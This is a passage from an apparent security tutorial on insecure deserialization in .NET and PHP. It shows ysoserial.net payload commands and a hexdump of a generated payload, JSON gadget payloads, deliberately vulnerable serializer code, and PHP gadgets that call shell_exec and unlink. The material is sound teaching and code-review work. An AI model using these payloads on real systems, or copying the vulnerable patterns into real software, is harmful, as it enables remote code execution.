                        FastJson
                        JavaScriptSerializer
                        XmlSerializer
                        DataContractSerializer
                        YamlDotNet < 5.0.0
        TextFormattingRunProperties (TextFormattingRunProperties Gadget by Oleksandr Mirosh and Alvaro Munoz)
                Formatters:
                        BinaryFormatter
                        ObjectStateFormatter
                        SoapFormatter
                        NetDataContractSerializer
                        LosFormatter
        PSObject (PSObject Gadget by Oleksandr Mirosh and Alvaro Munoz. Target must run a system not patched for CVE-2017-8565 (Published: 07/11/2017))
                Formatters:
                        BinaryFormatter
                        ObjectStateFormatter
                        SoapFormatter
                        NetDataContractSerializer
                        LosFormatter
        TypeConfuseDelegate (TypeConfuseDelegate gadget by James Forshaw)
                Formatters:
                        BinaryFormatter
                        ObjectStateFormatter
                        NetDataContractSerializer
                        LosFormatter
        TypeConfuseDelegateMono (TypeConfuseDelegate gadget by James Forshaw - Tweaked to work with Mono)
                Formatters:
                        BinaryFormatter
                        ObjectStateFormatter
                        NetDataContractSerializer
                        LosFormatter
        WindowsIdentity (WindowsIdentity Gadget by Levi Broderick)
                Formatters:
                        BinaryFormatter
                        Json.Net
                        DataContractSerializer
                        SoapFormatter

Available plugins:
        ActivatorUrl (Sends a generated payload to an activated, presumably remote, object)
        Altserialization (Generates payload for HttpStaticObjectsCollection or SessionStateItemCollection)
        ApplicationTrust (Generates XML payload for the ApplicationTrust class)
        Clipboard (Generates payload for DataObject and copy it into the clipboard - ready to be pasted in affected apps)
        DotNetNuke (Generates payload for DotNetNuke CVE-2017-9822)
        Resx (Generates RESX files)
        SessionSecurityTokenHandler (Generates XML payload for the SessionSecurityTokenHandler class)
        SharePoint (Generates poayloads for the following SharePoint CVEs: CVE-2019-0604, CVE-2018-8421)
        TransactionManagerReenlist (Generates payload for the TransactionManager.Reenlist method)
        ViewState (Generates a ViewState using known MachineKey parameters)

A valid payload for the example deserializer can be generated via the following command:

$ ysoserial-net -f BinaryFormatter -g TypeConfuseDelegate -o raw -c calc.exe > desert.ser

The following object would be created:

$ hexdump.exe -C desert.ser
00000000  00 01 00 00 00 ff ff ff  ff 01 00 00 00 00 00 00  |................|
00000010  00 0c 02 00 00 00 49 53  79 73 74 65 6d 2c 20 56  |......ISystem, V|
00000020  65 72 73 69 6f 6e 3d 34  2e 30 2e 30 2e 30 2c 20  |ersion=4.0.0.0, |
00000030  43 75 6c 74 75 72 65 3d  6e 65 75 74 72 61 6c 2c  |Culture=neutral,|
00000040  20 50 75 62 6c 69 63 4b  65 79 54 6f 6b 65 6e 3d  | PublicKeyToken=|
00000050  62 37 37 61 35 63 35 36  31 39 33 34 65 30 38 39  |b77a5c561934e089|
00000060  05 01 00 00 00 84 01 53  79 73 74 65 6d 2e 43 6f  |.......System.Co|
00000070  6c 6c 65 63 74 69 6f 6e  73 2e 47 65 6e 65 72 69  |llections.Generi|
00000080  63 2e 53 6f 72 74 65 64  53 65 74 60 31 5b 5b 53  |c.SortedSet`1[[S|
00000090  79 73 74 65 6d 2e 53 74  72 69 6e 67 2c 20 6d 73  |ystem.String, ms|
000000a0  63 6f 72 6c 69 62 2c 20  56 65 72 73 69 6f 6e 3d  |corlib, Version=|
000000b0  34 2e 30 2e 30 2e 30 2c  20 43 75 6c 74 75 72 65  |4.0.0.0, Culture|
000000c0  3d 6e 65 75 74 72 61 6c  2c 20 50 75 62 6c 69 63  |=neutral, Public|
000000d0  4b 65 79 54 6f 6b 65 6e  3d 62 37 37 61 35 63 35  |KeyToken=b77a5c5|
000000e0  36 31 39 33 34 65 30 38  39 5d 5d 04 00 00 00 05  |61934e089]].....|
000000f0  43 6f 75 6e 74 08 43 6f  6d 70 61 72 65 72 07 56  |Count.Comparer.V|
00000100  65 72 73 69 6f 6e 05 49  74 65 6d 73 00 03 00 06  |ersion.Items....|
00000110  08 8d 01 53 79 73 74 65  6d 2e 43 6f 6c 6c 65 63  |...System.Collec|
00000120  74 69 6f 6e 73 2e 47 65  6e 65 72 69 63 2e 43 6f  |tions.Generic.Co|
00000130  6d 70 61 72 69 73 6f 6e  43 6f 6d 70 61 72 65 72  |mparisonComparer|
00000140  60 31 5b 5b 53 79 73 74  65 6d 2e 53 74 72 69 6e  |`1[[System.Strin|
00000150  67 2c 20 6d 73 63 6f 72  6c 69 62 2c 20 56 65 72  |g, mscorlib, Ver|
00000160  73 69 6f 6e 3d 34 2e 30  2e 30 2e 30 2c 20 43 75  |sion=4.0.0.0, Cu|
00000170  6c 74 75 72 65 3d 6e 65  75 74 72 61 6c 2c 20 50  |lture=neutral, P|
00000180  75 62 6c 69 63 4b 65 79  54 6f 6b 65 6e 3d 62 37  |ublicKeyToken=b7|
00000190  37 61 35 63 35 36 31 39  33 34 65 30 38 39 5d 5d  |7a5c561934e089]]|
000001a0  08 02 00 00 00 02 00 00  00 09 03 00 00 00 02 00  |................|
000001b0  00 00 09 04 00 00 00 04  03 00 00 00 8d 01 53 79  |..............Sy|
000001c0  73 74 65 6d 2e 43 6f 6c  6c 65 63 74 69 6f 6e 73  |stem.Collections|
000001d0  2e 47 65 6e 65 72 69 63  2e 43 6f 6d 70 61 72 69  |.Generic.Compari|
000001e0  73 6f 6e 43 6f 6d 70 61  72 65 72 60 31 5b 5b 53  |sonComparer`1[[S|
000001f0  79 73 74 65 6d 2e 53 74  72 69 6e 67 2c 20 6d 73  |ystem.String, ms|
00000200  63 6f 72 6c 69 62 2c 20  56 65 72 73 69 6f 6e 3d  |corlib, Version=|
00000210  34 2e 30 2e 30 2e 30 2c  20 43 75 6c 74 75 72 65  |4.0.0.0, Culture|
00000220  3d 6e 65 75 74 72 61 6c  2c 20 50 75 62 6c 69 63  |=neutral, Public|
00000230  4b 65 79 54 6f 6b 65 6e  3d 62 37 37 61 35 63 35  |KeyToken=b77a5c5|
00000240  36 31 39 33 34 65 30 38  39 5d 5d 01 00 00 00 0b  |61934e089]].....|
00000250  5f 63 6f 6d 70 61 72 69  73 6f 6e 03 22 53 79 73  |_comparison."Sys|
00000260  74 65 6d 2e 44 65 6c 65  67 61 74 65 53 65 72 69  |tem.DelegateSeri|
00000270  61 6c 69 7a 61 74 69 6f  6e 48 6f 6c 64 65 72 09  |alizationHolder.|
00000280  05 00 00 00 11 04 00 00  00 02 00 00 00 06 06 00  |................|
00000290  00 00 0b 2f 63 20 63 61  6c 63 2e 65 78 65 06 07  |.../c calc.exe..|
000002a0  00 00 00 03 63 6d 64 04  05 00 00 00 22 53 79 73  |....cmd....."Sys|
000002b0  74 65 6d 2e 44 65 6c 65  67 61 74 65 53 65 72 69  |tem.DelegateSeri|
000002c0  61 6c 69 7a 61 74 69 6f  6e 48 6f 6c 64 65 72 03  |alizationHolder.|
000002d0  00 00 00 08 44 65 6c 65  67 61 74 65 07 6d 65 74  |....Delegate.met|
000002e0  68 6f 64 30 07 6d 65 74  68 6f 64 31 03 03 03 30  |hod0.method1...0|
000002f0  53 79 73 74 65 6d 2e 44  65 6c 65 67 61 74 65 53  |System.DelegateS|
00000300  65 72 69 61 6c 69 7a 61  74 69 6f 6e 48 6f 6c 64  |erializationHold|
00000310  65 72 2b 44 65 6c 65 67  61 74 65 45 6e 74 72 79  |er+DelegateEntry|
00000320  2f 53 79 73 74 65 6d 2e  52 65 66 6c 65 63 74 69  |/System.Reflecti|
00000330  6f 6e 2e 4d 65 6d 62 65  72 49 6e 66 6f 53 65 72  |on.MemberInfoSer|
00000340  69 61 6c 69 7a 61 74 69  6f 6e 48 6f 6c 64 65 72  |ializationHolder|
00000350  2f 53 79 73 74 65 6d 2e  52 65 66 6c 65 63 74 69  |/System.Reflecti|
00000360  6f 6e 2e 4d 65 6d 62 65  72 49 6e 66 6f 53 65 72  |on.MemberInfoSer|
00000370  69 61 6c 69 7a 61 74 69  6f 6e 48 6f 6c 64 65 72  |ializationHolder|
00000380  09 08 00 00 00 09 09 00  00 00 09 0a 00 00 00 04  |................|
00000390  08 00 00 00 30 53 79 73  74 65 6d 2e 44 65 6c 65  |....0System.Dele|
000003a0  67 61 74 65 53 65 72 69  61 6c 69 7a 61 74 69 6f  |gateSerializatio|
000003b0  6e 48 6f 6c 64 65 72 2b  44 65 6c 65 67 61 74 65  |nHolder+Delegate|
000003c0  45 6e 74 72 79 07 00 00  00 04 74 79 70 65 08 61  |Entry.....type.a|
000003d0  73 73 65 6d 62 6c 79 06  74 61 72 67 65 74 12 74  |ssembly.target.t|
000003e0  61 72 67 65 74 54 79 70  65 41 73 73 65 6d 62 6c  |argetTypeAssembl|
000003f0  79 0e 74 61 72 67 65 74  54 79 70 65 4e 61 6d 65  |y.targetTypeName|
00000400  0a 6d 65 74 68 6f 64 4e  61 6d 65 0d 64 65 6c 65  |.methodName.dele|
00000410  67 61 74 65 45 6e 74 72  79 01 01 02 01 01 01 03  |gateEntry.......|
00000420  30 53 79 73 74 65 6d 2e  44 65 6c 65 67 61 74 65  |0System.Delegate|
00000430  53 65 72 69 61 6c 69 7a  61 74 69 6f 6e 48 6f 6c  |SerializationHol|
00000440  64 65 72 2b 44 65 6c 65  67 61 74 65 45 6e 74 72  |der+DelegateEntr|
00000450  79 06 0b 00 00 00 b0 02  53 79 73 74 65 6d 2e 46  |y.......System.F|
00000460  75 6e 63 60 33 5b 5b 53  79 73 74 65 6d 2e 53 74  |unc`3[[System.St|
00000470  72 69 6e 67 2c 20 6d 73  63 6f 72 6c 69 62 2c 20  |ring, mscorlib, |
00000480  56 65 72 73 69 6f 6e 3d  34 2e 30 2e 30 2e 30 2c  |Version=4.0.0.0,|
00000490  20 43 75 6c 74 75 72 65  3d 6e 65 75 74 72 61 6c  | Culture=neutral|
000004a0  2c 20 50 75 62 6c 69 63  4b 65 79 54 6f 6b 65 6e  |, PublicKeyToken|
000004b0  3d 62 37 37 61 35 63 35  36 31 39 33 34 65 30 38  |=b77a5c561934e08|
000004c0  39 5d 2c 5b 53 79 73 74  65 6d 2e 53 74 72 69 6e  |9],[System.Strin|
000004d0  67 2c 20 6d 73 63 6f 72  6c 69 62 2c 20 56 65 72  |g, mscorlib, Ver|
000004e0  73 69 6f 6e 3d 34 2e 30  2e 30 2e 30 2c 20 43 75  |sion=4.0.0.0, Cu|
000004f0  6c 74 75 72 65 3d 6e 65  75 74 72 61 6c 2c 20 50  |lture=neutral, P|
00000500  75 62 6c 69 63 4b 65 79  54 6f 6b 65 6e 3d 62 37  |ublicKeyToken=b7|
00000510  37 61 35 63 35 36 31 39  33 34 65 30 38 39 5d 2c  |7a5c561934e089],|
00000520  5b 53 79 73 74 65 6d 2e  44 69 61 67 6e 6f 73 74  |[System.Diagnost|
00000530  69 63 73 2e 50 72 6f 63  65 73 73 2c 20 53 79 73  |ics.Process, Sys|
00000540  74 65 6d 2c 20 56 65 72  73 69 6f 6e 3d 34 2e 30  |tem, Version=4.0|
00000550  2e 30 2e 30 2c 20 43 75  6c 74 75 72 65 3d 6e 65  |.0.0, Culture=ne|
00000560  75 74 72 61 6c 2c 20 50  75 62 6c 69 63 4b 65 79  |utral, PublicKey|
00000570  54 6f 6b 65 6e 3d 62 37  37 61 35 63 35 36 31 39  |Token=b77a5c5619|
00000580  33 34 65 30 38 39 5d 5d  06 0c 00 00 00 4b 6d 73  |34e089]].....Kms|
00000590  63 6f 72 6c 69 62 2c 20  56 65 72 73 69 6f 6e 3d  |corlib, Version=|
000005a0  34 2e 30 2e 30 2e 30 2c  20 43 75 6c 74 75 72 65  |4.0.0.0, Culture|
000005b0  3d 6e 65 75 74 72 61 6c  2c 20 50 75 62 6c 69 63  |=neutral, Public|
000005c0  4b 65 79 54 6f 6b 65 6e  3d 62 37 37 61 35 63 35  |KeyToken=b77a5c5|
000005d0  36 31 39 33 34 65 30 38  39 0a 06 0d 00 00 00 49  |61934e089......I|
000005e0  53 79 73 74 65 6d 2c 20  56 65 72 73 69 6f 6e 3d  |System, Version=|
000005f0  34 2e 30 2e 30 2e 30 2c  20 43 75 6c 74 75 72 65  |4.0.0.0, Culture|
00000600  3d 6e 65 75 74 72 61 6c  2c 20 50 75 62 6c 69 63  |=neutral, Public|
00000610  4b 65 79 54 6f 6b 65 6e  3d 62 37 37 61 35 63 35  |KeyToken=b77a5c5|
00000620  36 31 39 33 34 65 30 38  39 06 0e 00 00 00 1a 53  |61934e089......S|
00000630  79 73 74 65 6d 2e 44 69  61 67 6e 6f 73 74 69 63  |ystem.Diagnostic|
00000640  73 2e 50 72 6f 63 65 73  73 06 0f 00 00 00 05 53  |s.Process......S|
00000650  74 61 72 74 09 10 00 00  00 04 09 00 00 00 2f 53  |tart........../S|
00000660  79 73 74 65 6d 2e 52 65  66 6c 65 63 74 69 6f 6e  |ystem.Reflection|
00000670  2e 4d 65 6d 62 65 72 49  6e 66 6f 53 65 72 69 61  |.MemberInfoSeria|
00000680  6c 69 7a 61 74 69 6f 6e  48 6f 6c 64 65 72 07 00  |lizationHolder..|
00000690  00 00 04 4e 61 6d 65 0c  41 73 73 65 6d 62 6c 79  |...Name.Assembly|
000006a0  4e 61 6d 65 09 43 6c 61  73 73 4e 61 6d 65 09 53  |Name.ClassName.S|
000006b0  69 67 6e 61 74 75 72 65  0a 53 69 67 6e 61 74 75  |ignature.Signatu|
000006c0  72 65 32 0a 4d 65 6d 62  65 72 54 79 70 65 10 47  |re2.MemberType.G|
000006d0  65 6e 65 72 69 63 41 72  67 75 6d 65 6e 74 73 01  |enericArguments.|
000006e0  01 01 01 01 00 03 08 0d  53 79 73 74 65 6d 2e 54  |........System.T|
000006f0  79 70 65 5b 5d 09 0f 00  00 00 09 0d 00 00 00 09  |ype[]...........|
00000700  0e 00 00 00 06 14 00 00  00 3e 53 79 73 74 65 6d  |.........>System|
00000710  2e 44 69 61 67 6e 6f 73  74 69 63 73 2e 50 72 6f  |.Diagnostics.Pro|
00000720  63 65 73 73 20 53 74 61  72 74 28 53 79 73 74 65  |cess Start(Syste|
00000730  6d 2e 53 74 72 69 6e 67  2c 20 53 79 73 74 65 6d  |m.String, System|
00000740  2e 53 74 72 69 6e 67 29  06 15 00 00 00 3e 53 79  |.String).....>Sy|
00000750  73 74 65 6d 2e 44 69 61  67 6e 6f 73 74 69 63 73  |stem.Diagnostics|
00000760  2e 50 72 6f 63 65 73 73  20 53 74 61 72 74 28 53  |.Process Start(S|
00000770  79 73 74 65 6d 2e 53 74  72 69 6e 67 2c 20 53 79  |ystem.String, Sy|
00000780  73 74 65 6d 2e 53 74 72  69 6e 67 29 08 00 00 00  |stem.String)....|
00000790  0a 01 0a 00 00 00 09 00  00 00 06 16 00 00 00 07  |................|
000007a0  43 6f 6d 70 61 72 65 09  0c 00 00 00 06 18 00 00  |Compare.........|
000007b0  00 0d 53 79 73 74 65 6d  2e 53 74 72 69 6e 67 06  |..System.String.|
000007c0  19 00 00 00 2b 49 6e 74  33 32 20 43 6f 6d 70 61  |....+Int32 Compa|
000007d0  72 65 28 53 79 73 74 65  6d 2e 53 74 72 69 6e 67  |re(System.String|
000007e0  2c 20 53 79 73 74 65 6d  2e 53 74 72 69 6e 67 29  |, System.String)|
000007f0  06 1a 00 00 00 32 53 79  73 74 65 6d 2e 49 6e 74  |.....2System.Int|
00000800  33 32 20 43 6f 6d 70 61  72 65 28 53 79 73 74 65  |32 Compare(Syste|
00000810  6d 2e 53 74 72 69 6e 67  2c 20 53 79 73 74 65 6d  |m.String, System|
00000820  2e 53 74 72 69 6e 67 29  08 00 00 00 0a 01 10 00  |.String)........|
00000830  00 00 08 00 00 00 06 1b  00 00 00 71 53 79 73 74  |...........qSyst|
00000840  65 6d 2e 43 6f 6d 70 61  72 69 73 6f 6e 60 31 5b  |em.Comparison`1[|
00000850  5b 53 79 73 74 65 6d 2e  53 74 72 69 6e 67 2c 20  |[System.String, |
00000860  6d 73 63 6f 72 6c 69 62  2c 20 56 65 72 73 69 6f  |mscorlib, Versio|
00000870  6e 3d 34 2e 30 2e 30 2e  30 2c 20 43 75 6c 74 75  |n=4.0.0.0, Cultu|
00000880  72 65 3d 6e 65 75 74 72  61 6c 2c 20 50 75 62 6c  |re=neutral, Publ|
00000890  69 63 4b 65 79 54 6f 6b  65 6e 3d 62 37 37 61 35  |icKeyToken=b77a5|
000008a0  63 35 36 31 39 33 34 65  30 38 39 5d 5d 09 0c 00  |c561934e089]]...|
000008b0  00 00 0a 09 0c 00 00 00  09 18 00 00 00 09 16 00  |................|
000008c0  00 00 0a 0b                                       |....|

Trying to deserialize the above object would cause a calculator to spawn on the system. As observable from the command, the gadget TypeConfuseDelegate was used for exploitation. The process used by this gadget is different yet similar to the one used above by the custom implemented RCE class.

Before digging deep into the process used by TypeConfuseDelegate, it is necessary to describe how the Delegate class is used in the .NET architecture, and how it can be exploited by insecure deserialization in a similar way to the above RCE class. Considering the following class:

[Serializable] 
public class WrapEvent : IDeserializationCallback
{
    Delegate _delegated;
    string _parameters;
    public WrapEvent(Delegate delegated, string parameters)
    {
        _delegated = delegated;
        _parameters = parameters;
    }
    public bool Run()
    {
        return (bool)_delegated.DynamicInvoke(_parameters);
    }

    public void OnDeserialization(object sender)
    {
        Run();
    }
}

How can this be exploited? The main idea is to find a way to set the _delegate parameter to System.Diagnostic.Process and _parameters to a command to execute.

To achieve this result, TypeConfuseDelegate generates a payload operating the following steps:

Create a Comparison object (function to compare strings)
Create a MulticastDelegate with two entries, setting both of them to Comparison (current object = MulticastDelegate<Comparison(String,String),Comparison(String,String)>)
Create a SortedSet, and associate the ComparisonComparer as the compare function
Using introspection, change the type of one of the Comparison objects to Process.Start
- This works because, by default, Microsoft doesn’t enforce type signatures of delegate objects
Add to the SortedSet two strings (“cmd”, “args”)

Note that cmd, args could be any command - args combination

Upon deserialization, the following would then happen:

To rebuild the SortedSet, the comparison function is reinitialised
The ComparerComparison calls the MulticastDelegate as its comparison delegate
To operate the comparison, the MulticastDelegate runs the Compare() and Start() functions in parallel
Compare() will just compare “cmd” and “arg” as strings
Start() will spawn a process and execute the “cmd” and “args” as OS commands

.NET: Text-Based Archive Format

As for JAVA, .NET is not immune to deserialization issues affecting Text-Based archive formats, such as XML, JSON, [Net]DataContract. These formats are usually handled by the following serializers:

XmlSerializer (XML)
[Net]DataContractSerializer (XML dialect)
JavaScriptSerializer (JSON)

Note: The [Net]DataContractSerializer will not be taken into consideration

XML

As an example of XML Serialization, let’s consider the following example:

public static void xmlDesertDeserial(string filename) 
{
    var stream = new FileStream(filename, FileMode.Open, FileAccess.Read);
    var reader = new StreamReader(stream);
    XmlSerializer serializer = new XmlSerializer(typeof(Desert));
    // Deseriliazing a dEsert object.. isn't it?
    var desert = (Desert)serializer.Deserialize(reader);
    reader.Close();
    stream.Close();
}

The only valuable pieces to note are:

The (Desert)serializer.Deserialize(reader) cast doesn’t offer any additional protection, as the cast logically comes AFTER the deserialization process
The typeof(Desert) will forbid the XmlSerializer to deserialize other Classes

Which means that even crafting an xml using the following serializer, it won’t work:

 [Serializable]
public class RCE
{
    private String _cmd = "calc.exe";
    public String cmd
    {
        get { return _cmd;  }
        set { _cmd = value; }
    }

    public void Run()
    {
        System.Diagnostics.Process p = new System.Diagnostics.Process();
        p.StartInfo.FileName = _cmd;
        p.Start();
        p.Dispose();
    }
}

public static void xmlRCESerial(string filename) 
{
    // Create desert name
    var rce = new RCE();
    // Persist to file
    TextWriter writer = new StreamWriter(filename + ".xml");
    XmlSerializer serializer = new XmlSerializer(typeof(Desert));
    Console.WriteLine("Serializing desert (!?)");
    serializer.Serialize(writer, rce);
    writer.Close();
} 

However, it is possible to exploit this function if the attacker can control the expected type of the XmlSerializer.

In that case, it would be possible to craft an exploit generating the serialized verion of the RCE calss, or using ysoserial.net:

$ ysoserial-net -g ObjectDataProvider -f XmlSerializer -c "calc" -o raw

JSON

In their research, Firday the 13th, JSON Attacks, Alvaro Muñoz and Oleksandr Mirosh explained how it was possible to apply similar methods seen for JAVA JSON deserialization to exploit .NET JSON deserialization. The research is extremely accurate, and points out a list of libraries affected by this vulnerability. As such, the article won’t cover in details every library, but focus more on explaining that no concrete difference exists between JSON and XML/Binary deserialization in terms of exploitation.

The research states that, in order to successfully exploit JSON deserialization, the following conditions must be satisfied:

Attacker can control type of reconstructed objects [Same as binary/xml]
- Can specify Type
  - _type, $type, class, classname, javaClass, …, etc.
- Library loads and instantiate Type
Library/GC will call methods on reconstructed objects [Setter/Getter/Constructors/Destructors, same as for binary/xml]
There are gadget chains starting on method executed upon/after reconstruction [Visibility constraint, same as for binary/xml]

As highlighted, there is no big difference from the constraints already presented for other archive formats.

In order to prove that, the JavaScriptSerializer would be taken as example. This specific serializer is not vulnerable by itself, as it doesn’t permit the deserialization of non native types by default. However, it becomes vulnerable when used in combination with SimpleTypeResolver, as this resolver enable custom types deserialization. Considering the following vulnerable example:

public static void jsonRCEDeserial(string filename)
{
    filename += ".json";
    // Vulnerable use of JavaScriptSerializer
    JavaScriptSerializer serializer = new JavaScriptSerializer(new SimpleTypeResolver());
    var stream = new FileStream(filename, FileMode.Open, FileAccess.Read);
    var reader = new StreamReader(stream);
    var desert = serializer.Deserialize<Desert>(reader.ReadToEnd());
    reader.Close();
    stream.Close();
}

[Serializable]
public class RCE 
{
    private String _cmd;
    public String cmd
    {
        get { return _cmd; }
        set
        {
            _cmd = value;
            Run();
        }
    }

    public void Run()
    {
        System.Diagnostics.Process p = new System.Diagnostics.Process();
        p.StartInfo.FileName = _cmd;
        p.Start();
        p.Dispose();
    }
}

[Serializable]
public class Desert
{
    private String _name;
    public String name
    {
        get { return _name; }
        set { _name = value; Console.WriteLine("Desert name: " + _name); }
    }
}

As observable, the serializer is unsafely used to deserialize an expected Desert object. However, the type definition on the deserializer doesn’t forbid the deserialization of unknown objects, as JavaScriptSerializer doesn’t perform any kind of whitelisting or object inspection. As such, like previously explained, the RCE class can be used as a valid gadget, triggering a remote command execution during the deserialization process.

To build a successful payload, the following code can be used:

public static void jsonRCESerial(string filename)
{
    filename += ".json";
    var desert = new RCE();
    desert.cmd = "calc.exe";
    // Persist to file
    using (StreamWriter stream = File.CreateText(filename))
    {
        Console.WriteLine("Serializing RCE");
        JavaScriptSerializer serializer = new JavaScriptSerializer();
        stream.Write(serializer.Serialize(desert));
    }
}

Which would produce the following payload:

{"__type":"BinarySerialization.RCE, BinarySeriliazer, Version=0.0.0.0, Culture=neutral, PublicKeyToken=null","cmd":"calc.exe"}

Of course, it is also possible to generate an exploitation payload using ysoserial.net:

$ ysoserial-net -g ObjectDataProvider -f JavaScriptSerializer -c "calc" -o raw
{
    '__type':'System.Windows.Data.ObjectDataProvider, PresentationFramework, Version=4.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35',
    'MethodName':'Start',
    'ObjectInstance':{
        '__type':'System.Diagnostics.Process, System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089',
        'StartInfo': {
            '__type':'System.Diagnostics.ProcessStartInfo, System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089',
            'FileName':'cmd',
            'Arguments':'/c calc'
        }
    }
}

Tips for Source Code reviewers

To find this kind of vulnerability it is usually a good start to search the code for common regexes, like:

(JavaScript|Xml|(Net)*DataContract)Serializer
(Binary|ObjectState|Los|Soap|Client|Server)Formatter
Json.Net
YamlDotNet
FastJson
Xaml
TypeNameHandling
SimpleTypeResolver
(Serialization|Deerialize|UnsafeDeserialize)
(ComponentModel.Activity|Load|Activity.Load)
ResourceReader
(ProxyObject|DecodeSerializedObject|DecodeValue)
ServiceStack.Text

For each match, the code should be manually inspected to see whether the object being deserialized can be manipulated by an external attacker.

PHP

Native Serialization Archive

PHP offers native serialization support via its to methods serialize() and unserialize() which can be used to perform serialization and deserialization of any PHP object that should be stored, transfered or transformed. The PHP serialized object format, it’s not far from a JSON array and it’s human readable.

PHP serialized object example:
O:8:"abcd1234":1:{s:7:"AString";s:13:"AnotherString";}

How to read it?

O: Object
8: Class Name Length
“abcd1234”: Class Name
1: Number of properties
{}: Properties
s:7: String of length 7
s:13: String of length 13

A good example of serialized object in PHP is the session file, usually stored within /var/lib/php5/sess_[PHPSESSID].

PHP: Differences from JAVA and .NET

The exploitation in PHP strictly depends on the application specific implementation. What does that mean? As already seen for JAVA and .NET, exploiting deserialization require chaining or exploiting class/objects which are implemented in a specific way (gadgets). That would mean that, if a PHP application was built in pure functional PHP, there would be no way to find valid POP gadgets, and that would make virtually impossible to exploit this kind of issue. To make things more complicated, PHP libraries are not uniformly shared among PHP based frameworks/applications; as such, the process of generalizing this kind of exploit is unfeasible.

Obviously, it doesn’t mean that it’s not exploitable, it means that, potentially, a different suitable vector should be found for any different application.

To understand what to look for when hunting this kind of vulnerabilities, it is needed to deeply understand the application flow during the deserialization process.

PHP mainly serialize/deserialize data using serialize and unserialize functions. These two functions are vulnerable as long as suitable gadgets for exploitation exists, which means a deep study of the classes implemented by the application is needed in order to know if an exploitable condition exists.

Before going further, it is better to introduce PHP Magic Methods. In PHP, Magic methods are functions of the standard API to be used in Object-Oriented PHP. These methods are automatically called if certain conditions are met. The most known magic methods are:

__construct() PHP class constructor, if implemented within a class, it is automatically called upon object creation
__destruct() PHP class destructor, if implemented within a class, it is automatically called when references to the object are removed from memory
__toString() PHP call-back that gets executed if the object is treated like a string
__wakeup() PHP call-back that gets executed upon deserialization

For an exhaustive list of all PHP magic methods, refer to the following link:

https://www.php.net/manual/en/language.oop5.magic.php

PHP: How to search for valid “gadgets”

After the call to unserialize, a magic method may be called on the deserialized object, which can potentially lead to an RCE.

It is possible to see how the process works analysing the following example:

<?php

class RCE {

    public $cmd;
    
    function __construct($cmd){
        $this->cmd = $cmd;
    }

    function __wakeup(){
        shell_exec($this->cmd);
    }
}

class FileDelete{
    
    public $filename;
    
    function usefile(){
        // Do something
    }
    
    function __destruct(){
        unlink($this->filename);
    }
}

class Desert{
    public $name;
    
    function __construct($name){
        $this->name = $name;
        echo("[+] Constructing new desert!\n");
    }

    function __toString(){
        echo("[+] The desert is called: $this->name!\n");
        return $this->name;
    }

    function __wakeup(){
        echo("[+] New Desert created! Hello $this->name!\n");
    }

    function __destruct(){
        echo("[+] Bye Bye $this->name\n");
    }
    
}

$testfile = @fopen("test", "w+");
@fclose($testfile);

if($argc < 2){
    echo("[-] Not enough parameters");
}else if($argv[1] === "-d"){
    $desert = unserialize(file_get_contents("desert"));
}else if(($argv[1] === "-e") and ($argc > 2)){
    if($argv[2] === "desert"){
        file_put_contents("desert", serialize(new Desert("Sahara")));
    }else if($argv[2] === "rce"){
        file_put_contents("desert", serialize(new RCE("cmd /c calc")));
    }else if($argv[1] == "file-delete"){
        file_put_contents("desert", serialize(new FileDelete("test")));
    }
}
?>

This tiny script act as both a serializer and deserializer for three different classes, that for sake of simplicity are named in a very intuitive way, respecting the standard format of other examples provided so far.

Important things to note within the script:

The class RCE is a valid PHP gadget for remote command execution, with the potential vector __wakeup
The class FileDelete is a valid gadget for Arbitrary File Deletion, with the potential vector __destruct
The class Desert is the main, good class. We’ll use it to study to trace function calls during deserialization

Function Calls

A valid desert file can be generated using the following command:

$ php php-desert.php -e desert
[+] Constructing new desert!
[+] Bye Bye Sahara

Studying the output, it is possible to see that both the __construct and __destruct are called. If deserialized, it would produce the following output:

$ php php-desert.php -d
[+] New Desert created! Hello Sahara!
[+] Bye Bye Sahara

That’s interesting. The __construct was not considered at all, and of course, the __toString was not called as well. This clearly shows that the most reliable methods to be used for deserialization exploitation are:

__wekeup
__destruct

As they are the only two methods that will be surely executed on an object during deserialization. All the others, even if exploitable in some situation, are tied to the application implementation and may, or may not, be called on an object.

If the FileDelete class was seriliazed instead, it should be noticed that, upon deserialization, the file name test would be deleted. Of course, as no input validation is implemented, the reader may try to exploit an arbitrary (carefully) file. Instead, if the RCE class is serialized:

$ php php-desert.php -e rce
$ php php-desert.php -d

A calculator will spawn on the hosting server.

To have additional reading about PHP deserialization, the following walkthrough may be of interest:

https://klezVirus.github.io/reviews/vulnhub/raven2

This walkthrough is part of a series HTB and VulnHub, an OSWE Approach

PHP: PHAR Driven Deserialization

Another interesting feature of PHP, is that deserialization may be triggered by certain special conditions, such as loading object using PHP Wrappers.

In the following paragraph, it will be shown how to exploit serialization triggered by a file operation made with “phar://”. Of course, in order to be exploitable, an attacker may be able control the file used during the file operation. The logical flow can be summarised as following:

User Provided input: $file = “phar://evil.phar/evil”
Implemented function: $phar = fopen -> read: $file, file_get_contents: $file
Call induced by phar://: $obj = unserialize($phar)
Call induced by unserialize: $obj.__wakeup()
Call induced by unserialize: $obj.__destruct()

The logical flow, above, shows that the only two possible vectors for this kind of exploitation are: __destruct and __wakeup, as they are the only two called during the deserialization induced by the phar:// wrapper.

The following snippet provides an example of vulnerable code. As observable, there is no class implemented within the PHP file, but Slim, Yii and Guzzle are installed and required via the vendor autoload script.

<?php
error_reporting(0);
// Requiring Slim, Yii and Guzzle (mod version) to enable visibility over POP gadgets
// php composer.phar yii/yii:1.1.20
// php composer.phar require slim/slim:3.8.1
// php composer.phar require guzzlehttp/guzzle:6.0.1 (re-unpatched version)
require 'vendor/autoload.php';

// Function vulnerable to phar:// deserialization
function vulnerable_to_phar($filename){
    echo("[*] Open file: $filename"); 
    $content = file_get_contents($filename);
    //print($content); // Enable this line to use Slim RCE
}

// Function vulnerable to RCE via insecure deserialization
function vulnerable_to_rce_via_gadgets($filename){
    echo("[*] Deserializing: $filename"); 
    $desert = unserialize(file_get_contents($filename));
    print($desert);
}
// Getting args from stdin
$args = getopt("f:p");
$file = $args["f"] or die("[-] Filename is required");

// Executing vulnerable functions
if(is_bool($args["p"])){
    vulnerable_to_phar($file);
}else{
    vulnerable_to_rce_via_gadgets($file);
}
?>

Taking a closer look at the file, it is evident that the potential vulnerabilities are two. One of them is exploitable via normal deserialization, while the other via deserialization induced by phar://. This time, instead of searching suitable classes manually, a very handy tool will be used, called PHPGGC.

